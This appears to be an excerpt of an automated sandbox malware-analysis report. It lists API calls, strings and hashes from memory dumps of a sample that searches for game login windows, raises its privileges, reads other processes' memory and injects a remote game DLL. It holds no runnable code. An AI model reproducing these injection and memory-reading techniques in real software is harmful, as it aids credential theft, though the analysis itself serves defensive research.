                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 97a7f5cb5cf4b49c3f390a5c5a2a57894e86908d3c578ad955931f3b75bc17d7
                                                                                  • Instruction ID: 4068f16c3b61e6a714b3c7bc5e6ed9d9bf92cb8dc7a4dfa99a034479c5b622fe
                                                                                  APIs
                                                                                  • IsWindowVisible.USER32(00000000), ref: 6A6DA633
                                                                                  • __wfopen_s.LIBCMT ref: 6A6DA66F
                                                                                  • OutputDebugStringA.KERNEL32(_strnicmp : WTWindow login window), ref: 6A6DA68D
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6DA694
                                                                                  • __wfopen_s.LIBCMT ref: 6A6DA6F7
                                                                                  • FindWindowExA.USER32(00000000,00000000,TTreeView,00000000), ref: 6A6DA72E
                                                                                  • FindWindowExA.USER32(00000000,00000000,TfrmGameList,00000000), ref: 6A6DA740
                                                                                  • FindWindowExA.USER32(00000000,00000000,SysTreeView32,00000000), ref: 6A6DA752
                                                                                  • FindWindowExA.USER32(00000000,00000000,TRzBmpButton,00000000), ref: 6A6DA764
                                                                                  • FindWindowExA.USER32(00000000,00000000,TRzTreeView,00000000), ref: 6A6DA776
                                                                                  • FindWindowExA.USER32(00000000,00000000,TVirtualStringTree,00000000), ref: 6A6DA788
                                                                                  • FindWindowExA.USER32(00000000,00000000,ComboBox,00000000), ref: 6A6DA79A
                                                                                  • FindWindowExA.USER32(00000000,00000000,TComboBox,00000000), ref: 6A6DA7AC
                                                                                  • FindWindowExA.USER32(00000000,00000000,_EL_Label,00000000), ref: 6A6DA7BE
                                                                                  • FindWindowExA.USER32(00000000,00000000,TfrmRegister,00000000), ref: 6A6DA7D0
                                                                                  • FindWindowExA.USER32(00000000,00000000,Internet Explorer_Server,00000000), ref: 6A6DA7E2
                                                                                  • FindWindowExA.USER32(00000000,00000000,_EL_RgnButton,00000000), ref: 6A6DA7F4
                                                                                  • FindWindowExA.USER32(00000000,00000000,Internet Explorer_Hidden,00000000), ref: 6A6DA806
                                                                                  • FindWindowExA.USER32(00000000,00000000,TForm_LoginBK,00000000), ref: 6A6DA818
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: Window$Find$DebugOutputString__wfopen_s$Visible
                                                                                  • String ID: C:\pl.txt$ComboBox$FindWindowEx : login window$Internet Explorer_Hidden$Internet Explorer_Server$IsPorcWithTargetClass : login window$SysTreeView32$TComboBox$TForm_LoginBK$TFrmMain$TRzBmpButton$TRzCheckBox$TRzTreeView$TTreeView$TVirtualStringTree$TfrmGameList$TfrmRegister$_EL_Label$_EL_RgnButton$_strnicmp : WTWindow login window$count is : %d
                                                                                  • API String ID: 1517189602-266419103
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D2A49
                                                                                  • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 6A6D2A5E
                                                                                  • wsprintfA.USER32 ref: 6A6D2A7F
                                                                                  • GetTickCount.KERNEL32 ref: 6A6D2A8B
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 6A6D2A98
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D2AE8
                                                                                  • OutputDebugStringA.KERNEL32(?), ref: 6A6D2AFC
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D2B03
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D2B1B
                                                                                  • OutputDebugStringA.KERNEL32(shout is empty), ref: 6A6D2B2F
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D2B36
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$Current__wfopen_s$CountDirectoryProcessTick_memsetwsprintf
                                                                                  • String ID: %s\$%s_MAP_89826$(sj$(sj$C:\789.txt$C:\Users\user\Desktop\CFA702\D2EDCA7E\A806AE3\9683JE76z.dll$C:\Users\user\Desktop\CFA702\D2EDCA7E\B2A26198\8C1AXUVPO.dll$C:\Users\user\Desktop\CFA702\D2EDCA7E\CF3651B9$C:\Users\user\Desktop\CFA702\D2EDCA7E\IB88701\B81BTTTQM.dll$C:\pl.txt$CreateProcessmapWq: GamesType : %d, engineType : %d$shout is empty${4872-11202-91}
                                                                                  • API String ID: 1111341681-4138625294
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
                                                                                    • Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
                                                                                  • ReadProcessMemory.KERNEL32 ref: 6A6D91EC
                                                                                  • ReadProcessMemory.KERNEL32(00000000,004D02EC,?,00000011,00000000), ref: 6A6D9272
                                                                                  • ReadProcessMemory.KERNEL32(00000000,004CE894,?,00000011,00000000), ref: 6A6D92F3
                                                                                  • ReadProcessMemory.KERNEL32(00000000,004D0064,?,00000011,00000000), ref: 6A6D9374
                                                                                  • ReadProcessMemory.KERNEL32(00000000,004CE730,?,00000011,00000000), ref: 6A6D93FC
                                                                                  • ReadProcessMemory.KERNEL32(00000000,004C95FE,?,00000015,00000000), ref: 6A6D9489
                                                                                  • ReadProcessMemory.KERNEL32(00000000,0050197C,?,00000011,00000000), ref: 6A6D952C
                                                                                  • ReadProcessMemory.KERNEL32(00000000,004CE744,?,0000000E,00000000), ref: 6A6D95C4
                                                                                  • ReadProcessMemory.KERNEL32(00000000,0072988C,?,00000012,00000000), ref: 6A6D9658
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6D96F1
                                                                                  Similarity
                                                                                  • API ID: Memory$Process$Read$Virtual$AllocateInformationOpenQuerySystem$AdjustCloseFreeHandlePrivilege
                                                                                  • String ID: .$.$1$8$8$a$a$a$c$c$d$h$i$m$m$m$n$o$o$r
                                                                                  • API String ID: 1302054802-2385272561
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32 ref: 6A6D11D9
                                                                                    • Part of subcall function 6A6E00F0: OpenProcessToken.ADVAPI32(00000000,000F01FF,?,?,?,?,6A6D11E6), ref: 6A6E00FE
                                                                                    • Part of subcall function 6A6E00F0: LookupPrivilegeValueA.ADVAPI32 ref: 6A6E0124
                                                                                    • Part of subcall function 6A6E00F0: CloseHandle.KERNEL32(?), ref: 6A6E0133
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D11F9
                                                                                  • OutputDebugStringA.KERNEL32(updebug(GetCurrentProcess())==FALSE), ref: 6A6D120C
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D1217
                                                                                  • Sleep.KERNEL32(0000000A), ref: 6A6D122C
                                                                                  • _memset.LIBCMT ref: 6A6D1244
                                                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 6A6D1270
                                                                                  • CloseHandle.KERNEL32(?), ref: 6A6D1289
                                                                                  • CloseHandle.KERNEL32(?), ref: 6A6D1290
                                                                                  • _memset.LIBCMT ref: 6A6D12DC
                                                                                  • ShellExecuteExA.SHELL32 ref: 6A6D131D
                                                                                  • _memset.LIBCMT ref: 6A6D1334
                                                                                  • _memset.LIBCMT ref: 6A6D1359
                                                                                  • _strrchr.LIBCMT ref: 6A6D1374
                                                                                  • _strncpy.LIBCMT ref: 6A6D1393
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D13AA
                                                                                  • OutputDebugStringA.KERNEL32(?), ref: 6A6D13C3
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D13CA
                                                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6A6D13F5
                                                                                  • _memset.LIBCMT ref: 6A6D140A
                                                                                  • CloseHandle.KERNEL32(?), ref: 6A6D142C
                                                                                  • CloseHandle.KERNEL32(?), ref: 6A6D1433
                                                                                  • Sleep.KERNEL32(0000000A), ref: 6A6D1454
                                                                                  • _malloc.LIBCMT ref: 6A6D146B
                                                                                  • _memset.LIBCMT ref: 6A6D1482
                                                                                  • _strncpy.LIBCMT ref: 6A6D14EF
                                                                                  Similarity
                                                                                  • API ID: _memset$CloseHandle$DebugOutputProcessString$CreateSleep__wfopen_s_strncpy$CurrentExecuteLookupOpenPrivilegeShellTokenValue_malloc_strrchr
                                                                                  • String ID: <$@$C:\pl.txt$updebug(GetCurrentProcess())==FALSE
                                                                                  • API String ID: 1005001699-4193612860
                                                                                  APIs
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D392D
                                                                                  • OutputDebugStringA.KERNEL32(in RemoteGameDllZs), ref: 6A6D3947
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D394E
                                                                                  • _memset.LIBCMT ref: 6A6D396E
                                                                                  • _strncpy.LIBCMT ref: 6A6D39C0
                                                                                  • _strncpy.LIBCMT ref: 6A6D39F0
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D3A04
                                                                                  • OutputDebugStringA.KERNEL32(996 type;path is:), ref: 6A6D3A18
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D3A1F
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D3A3D
                                                                                  • OutputDebugStringA.KERNEL32(?), ref: 6A6D3A51
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D3A58
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D3A7F
                                                                                  • OutputDebugStringA.KERNEL32(before RDTP), ref: 6A6D3A93
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D3A9A
                                                                                  • RDTP.A2F0JLEKS(?,?,?), ref: 6A6D3AB0
                                                                                  • _malloc.LIBCMT ref: 6A6D3AD2
                                                                                  • _memset.LIBCMT ref: 6A6D3AE1
                                                                                  • _strncpy.LIBCMT ref: 6A6D3B08
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D3B1C
                                                                                  • OutputDebugStringA.KERNEL32(before SendMessage), ref: 6A6D3B30
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D3B37
                                                                                  • SendMessageA.USER32(?,000007EB,00000000,00000000), ref: 6A6D3B58
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s$_strncpy$_memset$MessageSend_malloc
                                                                                  • String ID: 996 type;path is:$C:\pl.txt$before RDTP$before SendMessage$in RemoteGameDllZs
                                                                                  • API String ID: 2542873480-2955065797
                                                                                  • Opcode ID: 0a06733782b9b4d1452b12d37d42608cbf415a5c5edde065e67f59703eeeb558
                                                                                  • Instruction ID: 8800b051f197b819b9c9de5ed9df5e213d5b1a569077d4ed0bd38e54117df947
                                                                                  • Opcode Fuzzy Hash: 0a06733782b9b4d1452b12d37d42608cbf415a5c5edde065e67f59703eeeb558
                                                                                  • Instruction Fuzzy Hash: FB51E3B5508300ABE710EB65CC49F9BB7E5AFD5344F0A8828F65487251DF34EA0CCB92
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(version.dll,?,?,00000000), ref: 6A6D519C
                                                                                  • GetProcAddress.KERNEL32(00000000,GetFileVersionInfoSizeA), ref: 6A6D51D3
                                                                                  • GetProcAddress.KERNEL32(00000000,GetFileVersionInfoA), ref: 6A6D51E0
                                                                                  • GetProcAddress.KERNEL32(00000000,VerQueryValueA), ref: 6A6D51ED
                                                                                  • _malloc.LIBCMT ref: 6A6D5225
                                                                                  • _memset.LIBCMT ref: 6A6D5298
                                                                                  • wsprintfA.USER32 ref: 6A6D52BA
                                                                                  • _memset.LIBCMT ref: 6A6D52E8
                                                                                  • _sprintf.LIBCMT ref: 6A6D52FC
                                                                                  Strings
                                                                                  • \VarFileInfo\Translation, xrefs: 6A6D5256
                                                                                  • \StringFileInfo\%04x%04x\CompanyName, xrefs: 6A6D534A
                                                                                  • GetFileVersionInfoA, xrefs: 6A6D51D5
                                                                                  • GetFileVersionInfoSizeA, xrefs: 6A6D51CD
                                                                                  • cbDescSize is : %d, xrefs: 6A6D52F6
                                                                                  • \StringFileInfo\%04x%04x\LegalCopyright, xrefs: 6A6D53B3
                                                                                  • \StringFileInfo\%04x%04x\FileDescription, xrefs: 6A6D52B4
                                                                                  • VerQueryValueA, xrefs: 6A6D51E2
                                                                                  • version.dll, xrefs: 6A6D5187
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$_memset$LibraryLoad_malloc_sprintfwsprintf
                                                                                  • String ID: GetFileVersionInfoA$GetFileVersionInfoSizeA$VerQueryValueA$\StringFileInfo\%04x%04x\CompanyName$\StringFileInfo\%04x%04x\FileDescription$\StringFileInfo\%04x%04x\LegalCopyright$\VarFileInfo\Translation$cbDescSize is : %d$version.dll
                                                                                  • API String ID: 668115835-4254682184
                                                                                  • Opcode ID: b3d97fd0d22ec711bc354f66aa3bdaa44220365e49a694811e78ba6fe75dbf36
                                                                                  • Instruction ID: ad661d686207bafd5a099da991cf74b7a5cdcfcf817860b324210243559af837
                                                                                  • Opcode Fuzzy Hash: b3d97fd0d22ec711bc354f66aa3bdaa44220365e49a694811e78ba6fe75dbf36
                                                                                  • Instruction Fuzzy Hash: 2171B0B2108340AFD710EF64CC84DABB7F8EBC9744F054A2DF69597251EB74EA058B62
                                                                                  APIs
                                                                                  • __wfopen_s.LIBCMT ref: 6A6DBFD6
                                                                                  • OutputDebugStringA.KERNEL32(game type xk........................), ref: 6A6DBFF0
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6DBFF7
                                                                                  • __wfopen_s.LIBCMT ref: 6A6DC036
                                                                                  • __wfopen_s.LIBCMT ref: 6A6DC06E
                                                                                    • Part of subcall function 6A6FE0D8: __fsopen.LIBCMT ref: 6A6FE10E
                                                                                    • Part of subcall function 6A6DB990: OutputDebugStringA.KERNEL32(IsPorcWithTargetClass : login window,75ADA040,6A6DAA32,00000000), ref: 6A6DB998
                                                                                    • Part of subcall function 6A6DB990: OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6DB99F
                                                                                  • __wfopen_s.LIBCMT ref: 6A6DC0A5
                                                                                  Strings
                                                                                  • game type hero......................, xrefs: 6A6DC12B
                                                                                  • game type gom......................., xrefs: 6A6DC086
                                                                                  • other game type....................., xrefs: 6A6DC1C4
                                                                                  • game type gee......................., xrefs: 6A6DC0F4
                                                                                  • game type blue......................, xrefs: 6A6DC199
                                                                                  • game type ws........................, xrefs: 6A6DC04A
                                                                                  • game type xk........................, xrefs: 6A6DBFEB
                                                                                  • C:\pl.txt, xrefs: 6A6DBFD0, 6A6DC027, 6A6DC1E1
                                                                                  • game type ty........................, xrefs: 6A6DC1FC
                                                                                  • game type leg......................, xrefs: 6A6DC162
                                                                                  • game type dee......................., xrefs: 6A6DC0BD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString__wfopen_s$__fsopen
                                                                                  • String ID: C:\pl.txt$game type blue......................$game type dee.......................$game type gee.......................$game type gom.......................$game type hero......................$game type leg......................$game type ty........................$game type ws........................$game type xk........................$other game type.....................
                                                                                  • API String ID: 2578685260-2888131310
                                                                                  • Opcode ID: a0c2beb8e8d00340608c4ebec558574f75bcaf756c379ab44c0cee76470e01b4
                                                                                  • Instruction ID: 01dc2984d6d989ec6c756f73d893f18d876d714574494762d8938965fc9262b3
                                                                                  • Opcode Fuzzy Hash: a0c2beb8e8d00340608c4ebec558574f75bcaf756c379ab44c0cee76470e01b4
                                                                                  • Instruction Fuzzy Hash: 5951F4B6A041146BEB00E6D8A844B8EB3E59B84695F05883DF61AC7252EF31FD1CD7D3
                                                                                  APIs
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D2FA5
                                                                                  • OutputDebugStringA.KERNEL32(in RemoteGameDllWQ), ref: 6A6D2FBF
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D2FC6
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D2FF8
                                                                                  • OutputDebugStringA.KERNEL32(not newEngine1 or new Engine2), ref: 6A6D300C
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D3013
                                                                                  • _memset.LIBCMT ref: 6A6D3033
                                                                                  • _strncpy.LIBCMT ref: 6A6D3072
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D3089
                                                                                  • OutputDebugStringA.KERNEL32(?), ref: 6A6D309D
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D30A4
                                                                                  • GetFileAttributesA.KERNEL32(?), ref: 6A6D30B8
                                                                                  • MessageBoxA.USER32(00000000,6A71B208,6A71B1FC,00001000), ref: 6A6D30D8
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D3105
                                                                                  • OutputDebugStringA.KERNEL32(RemoteLibrary failed), ref: 6A6D3119
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D3120
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D313E
                                                                                  • OutputDebugStringA.KERNEL32(sleep if leg or blue), ref: 6A6D3152
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D3159
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 6A6D3175
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s$AttributesFileMessageSleep_memset_strncpy
                                                                                  • String ID: C:\pl.txt$RemoteLibrary failed$in RemoteGameDllWQ$not newEngine1 or new Engine2$sleep if leg or blue
                                                                                  • API String ID: 534663367-1936516422
                                                                                  • Opcode ID: 3e68e3ba9629bd660d390984c6ed159002ae4c5829ac394a53605c28efa16e36
                                                                                  • Instruction ID: 29cddbac20637b4d94611981647392395b87039db0bd95a6d99f50c675f8719f
                                                                                  • Opcode Fuzzy Hash: 3e68e3ba9629bd660d390984c6ed159002ae4c5829ac394a53605c28efa16e36
                                                                                  • Instruction Fuzzy Hash: E54193B1408300ABE710EBA58D45F5AB7F5AFD5354F0A8828FA6493251DF74EA0CCB93
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0BEA1365
                                                                                    • Part of subcall function 0BEA1330: GetProcAddress.KERNEL32(00000000), ref: 0BEA1349
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                  • API String ID: 1646373207-1918263038
                                                                                  • Opcode ID: d5e600d5e4125f136983fe4b62f7042162f6e06f518edf2c48572a8a10128ffc
                                                                                  • Instruction ID: 79916579c2d6471ed6e59a5ad20ac6ff4a999af6c1b2dac86a10673b1baf59e0
                                                                                  • Opcode Fuzzy Hash: d5e600d5e4125f136983fe4b62f7042162f6e06f518edf2c48572a8a10128ffc
                                                                                  • Instruction Fuzzy Hash: 9A415DA96152155E03047FAEB80346A7BCED7C6AD1BA1B02AB004FFB40EE30FD41562F
APIs
• CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 0BEB5B2B
• SelectObject.GDI32(?,?), ref: 0BEB5B40
• MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,0BEB5BBB,?,?), ref: 0BEB5B8F
• SelectObject.GDI32(?,?), ref: 0BEB5BA9
• DeleteObject.GDI32(?), ref: 0BEB5BB5
• CreateCompatibleDC.GDI32(00000000), ref: 0BEB5BC9
• CreateCompatibleBitmap.GDI32(?,?,?), ref: 0BEB5BEA
• SelectObject.GDI32(?,?), ref: 0BEB5BFF
• SelectPalette.GDI32(?,0E080E34,00000000), ref: 0BEB5C13
• SelectPalette.GDI32(?,?,00000000), ref: 0BEB5C25
• SelectPalette.GDI32(?,00000000,000000FF), ref: 0BEB5C3A
• SelectPalette.GDI32(?,0E080E34,000000FF), ref: 0BEB5C50
• RealizePalette.GDI32(?), ref: 0BEB5C5C
• StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0BEB5C7E
• StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 0BEB5CA0
• SetTextColor.GDI32(?,00000000), ref: 0BEB5CA8
• SetBkColor.GDI32(?,00FFFFFF), ref: 0BEB5CB6
• StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 0BEB5CE2
• StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 0BEB5D07
• SetTextColor.GDI32(?,?), ref: 0BEB5D11
• SetBkColor.GDI32(?,?), ref: 0BEB5D1B
• SelectObject.GDI32(?,00000000), ref: 0BEB5D2E
• DeleteObject.GDI32(?), ref: 0BEB5D37
• SelectPalette.GDI32(?,00000000,00000000), ref: 0BEB5D59
• DeleteDC.GDI32(?), ref: 0BEB5D62
Memory Dump Source
• Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
• Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
Similarity
• API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize
• String ID:
• API String ID: 3976802218-0
• Opcode ID: 8b84ef9260047d5eab9620b0097aa9263cc4fd91ae23f2b116e71ff85b6b760e
• Instruction ID: fbd5555fdbe6b1d3aa02d7010c5b4ab714299c3a6d5f9d11084f61701e9146c4
• Opcode Fuzzy Hash: 8b84ef9260047d5eab9620b0097aa9263cc4fd91ae23f2b116e71ff85b6b760e
• Instruction Fuzzy Hash: 90819CB2A10209AFDF50EFACDD95EEFBBECAB0D610F111554BA18E7240C674AD048B65
APIs
  • Part of subcall function 6A6E02D0: _memset.LIBCMT ref: 6A6E0354
  • Part of subcall function 6A6E02D0: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 6A6E0366
  • Part of subcall function 6A6E02D0: Module32First.KERNEL32 ref: 6A6E0380
  • Part of subcall function 6A6E02D0: Module32Next.KERNEL32(00000000,?), ref: 6A6E03D9
  • Part of subcall function 6A6E02D0: CloseHandle.KERNEL32(00000000), ref: 6A6E03E3
  • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
  • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
  • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
  • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
  • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
  • Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
  • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
  • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
• _memset.LIBCMT ref: 6A6DAC55
• ReadProcessMemory.KERNEL32(00000000,004A0000,?,00040000,?,?,?,?,?,?,?,6A6DD365), ref: 6A6DAC78
• ReadProcessMemory.KERNEL32(00000000,00600000,?,00040000,?,?,?,?,?,?,?,6A6DD365), ref: 6A6DACFF
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,6A6DD365), ref: 6A6DAD6F
Strings
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
• Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
